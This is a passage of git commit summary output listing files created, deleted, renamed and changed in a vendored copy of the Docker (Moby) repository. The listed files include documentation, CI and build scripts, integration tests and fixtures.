 create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/contributor-edit.png
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/copy_url.png
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/fork_docker.png
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/git_bash.png
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/list_example.png
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/set-up-git.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/software-req-win.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/software-required.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/test.md
 create mode 100644 vendor/github.com/docker/docker/docs/contributing/who-written-for.md
 delete mode 100644 vendor/github.com/docker/docker/docs/deprecated.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/EBS_volume.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/config.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_allow.png
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_chunked.png
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_deny.png
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/index.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/legacy_plugins.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugin_api.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_authorization.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_network.md
 delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_volume.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/builder.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/attach.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/build.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cli.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/commit.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cp.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/create.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/deploy.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/diff.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/events.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/exec.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/export.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/history.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/images.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/import.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/index.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/info.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/kill.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/load.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/login.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logout.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logs.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/menu.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_create.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_update.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pause.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/port.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/ps.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pull.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/push.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rename.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/restart.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rmi.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/run.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/save.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/search.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_create.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_update.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/start.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stats.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stop.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_df.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/tag.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/top.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/unpause.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/update.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/version.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/wait.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/glossary.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/index.md
 delete mode 100644 vendor/github.com/docker/docker/docs/reference/run.md
 delete mode 100644 vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png
 create mode 100644 vendor/github.com/docker/docker/docs/static_files/moby-project-logo.png
 create mode 100644 vendor/github.com/docker/docker/errdefs/defs.go
 create mode 100644 vendor/github.com/docker/docker/errdefs/doc.go
 create mode 100644 vendor/github.com/docker/docker/errdefs/helpers.go
 create mode 100644 vendor/github.com/docker/docker/errdefs/helpers_test.go
 create mode 100644 vendor/github.com/docker/docker/errdefs/is.go
 delete mode 100644 vendor/github.com/docker/docker/experimental/README.md
 delete mode 100644 vendor/github.com/docker/docker/experimental/checkpoint-restore.md
 delete mode 100644 vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png
 delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg
 delete mode 100644 vendor/github.com/docker/docker/experimental/vlan-networks.md
 delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh
 delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh
 delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/readme.md
 create mode 100644 vendor/github.com/docker/docker/hack/README.md
 create mode 100755 vendor/github.com/docker/docker/hack/ci/arm
 create mode 100755 vendor/github.com/docker/docker/hack/ci/experimental
 create mode 100755 vendor/github.com/docker/docker/hack/ci/janky
 create mode 100755 vendor/github.com/docker/docker/hack/ci/powerpc
 create mode 100755 vendor/github.com/docker/docker/hack/ci/z
 delete mode 100755 vendor/github.com/docker/docker/hack/dockerfile/binaries-commits
 delete mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/containerd.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/dockercli.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/gometalinter.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/install.sh
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/proxy.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/runc.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/tini.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/tomlv.installer
 create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/vndr.installer
 delete mode 100644 vendor/github.com/docker/docker/hack/install.sh
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go
 create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/compat
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/control
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion
 delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default
 delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init
 delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst
 delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docs
 delete mode 100755 vendor/github.com/docker/docker/hack/make/.build-deb/rules
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec
 delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec
 delete mode 100644 vendor/github.com/docker/docker/hack/make/binary-client
 delete mode 100644 vendor/github.com/docker/docker/hack/make/build-deb
 mode change 100644 => 100755 vendor/github.com/docker/docker/hack/make/build-integration-test-binary
 delete mode 100644 vendor/github.com/docker/docker/hack/make/build-rpm
 delete mode 100755 vendor/github.com/docker/docker/hack/make/clean-apt-repo
 delete mode 100755 vendor/github.com/docker/docker/hack/make/clean-yum-repo
 delete mode 100644 vendor/github.com/docker/docker/hack/make/cover
 delete mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-client
 delete mode 100755 vendor/github.com/docker/docker/hack/make/generate-index-listing
 delete mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-client
 delete mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-daemon
 delete mode 100644 vendor/github.com/docker/docker/hack/make/install-script
 delete mode 100755 vendor/github.com/docker/docker/hack/make/release-deb
 delete mode 100755 vendor/github.com/docker/docker/hack/make/release-rpm
 delete mode 100755 vendor/github.com/docker/docker/hack/make/sign-repos
 delete mode 100755 vendor/github.com/docker/docker/hack/make/test-deb-install
 delete mode 100755 vendor/github.com/docker/docker/hack/make/test-install-script
 create mode 100755 vendor/github.com/docker/docker/hack/make/test-integration
 delete mode 100755 vendor/github.com/docker/docker/hack/make/test-old-apt-repo
 delete mode 100644 vendor/github.com/docker/docker/hack/make/test-unit
 delete mode 100644 vendor/github.com/docker/docker/hack/make/tgz
 delete mode 100644 vendor/github.com/docker/docker/hack/make/ubuntu
 delete mode 100755 vendor/github.com/docker/docker/hack/make/update-apt-repo
 delete mode 100644 vendor/github.com/docker/docker/hack/make/win
 delete mode 100755 vendor/github.com/docker/docker/hack/release.sh
 create mode 100755 vendor/github.com/docker/docker/hack/test/e2e-run.sh
 create mode 100755 vendor/github.com/docker/docker/hack/test/unit
 create mode 100755 vendor/github.com/docker/docker/hack/validate/changelog-date-descending
 create mode 100755 vendor/github.com/docker/docker/hack/validate/changelog-well-formed
 delete mode 100755 vendor/github.com/docker/docker/hack/validate/compose-bindata
 create mode 100755 vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli
 delete mode 100755 vendor/github.com/docker/docker/hack/validate/gofmt
 create mode 100755 vendor/github.com/docker/docker/hack/validate/gometalinter
 create mode 100644 vendor/github.com/docker/docker/hack/validate/gometalinter.json
 delete mode 100755 vendor/github.com/docker/docker/hack/validate/lint
 delete mode 100755 vendor/github.com/docker/docker/hack/validate/vet
 rename vendor/github.com/docker/docker/{daemon => image/cache}/cache.go (72%)
 rename vendor/github.com/docker/docker/{runconfig => image/cache}/compare.go (82%)
 rename vendor/github.com/docker/docker/{runconfig => image/cache}/compare_test.go (68%)
 create mode 100644 vendor/github.com/docker/docker/image/spec/README.md
 rename vendor/github.com/docker/docker/{pkg/integration => integration-cli}/checker/checker.go (95%)
 create mode 100644 vendor/github.com/docker/docker/integration-cli/cli/build/build.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/cli/cli.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon/daemon.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm.go
 rename vendor/github.com/docker/docker/integration-cli/{daemon_swarm_hack.go => daemon_swarm_hack_test.go} (77%)
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_unix.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_windows.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go
 rename vendor/github.com/docker/docker/integration-cli/{docker_cli_cp_utils.go => docker_cli_cp_utils_test.go} (76%)
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_test_vars.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils_test.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/environment/environment.go
 rename vendor/github.com/docker/docker/integration-cli/{events_utils.go => events_utils_test.go} (98%)
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml
 mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
 mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
 mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
 mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem
 mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key
 delete mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default
 rename vendor/github.com/docker/docker/integration-cli/{fixtures_linux_daemon.go => fixtures_linux_daemon_test.go} (79%)
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/registry.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/registry_mock.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/requirement/requirement.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/requirements.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_test.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go
 rename vendor/github.com/docker/docker/integration-cli/{test_vars_exec.go => test_vars_exec_test.go} (100%)
 rename vendor/github.com/docker/docker/integration-cli/{test_vars_noexec.go => test_vars_noexec_test.go} (100%)
 rename vendor/github.com/docker/docker/integration-cli/{test_vars_noseccomp.go => test_vars_noseccomp_test.go} (100%)
 rename vendor/github.com/docker/docker/integration-cli/{test_vars_seccomp.go => test_vars_seccomp_test.go} (100%)
 rename vendor/github.com/docker/docker/integration-cli/{test_vars.go => test_vars_test.go} (90%)
 rename vendor/github.com/docker/docker/integration-cli/{test_vars_unix.go => test_vars_unix_test.go} (100%)
 rename vendor/github.com/docker/docker/integration-cli/{test_vars_windows.go => test_vars_windows_test.go} (100%)
 rename vendor/github.com/docker/docker/integration-cli/{fixtures/load => testdata}/emptyLayer.tar (100%)
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/trust_server.go
 delete mode 100644 vendor/github.com/docker/docker/integration-cli/utils.go
 create mode 100644 vendor/github.com/docker/docker/integration-cli/utils_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/build/build_session_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/build/build_squash_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/build/build_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/build/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/config/config_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/config/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/copy_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/create_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/daemon_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/diff_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/exec_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/export_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/health_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/kill_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/links_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/logs_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/mounts_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/nat_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/pause_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/ps_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/remove_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/rename_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/resize_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/restart_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/stats_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/stop_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/update_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/container/update_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/doc.go
 create mode 100644 vendor/github.com/docker/docker/integration/image/commit_test.go
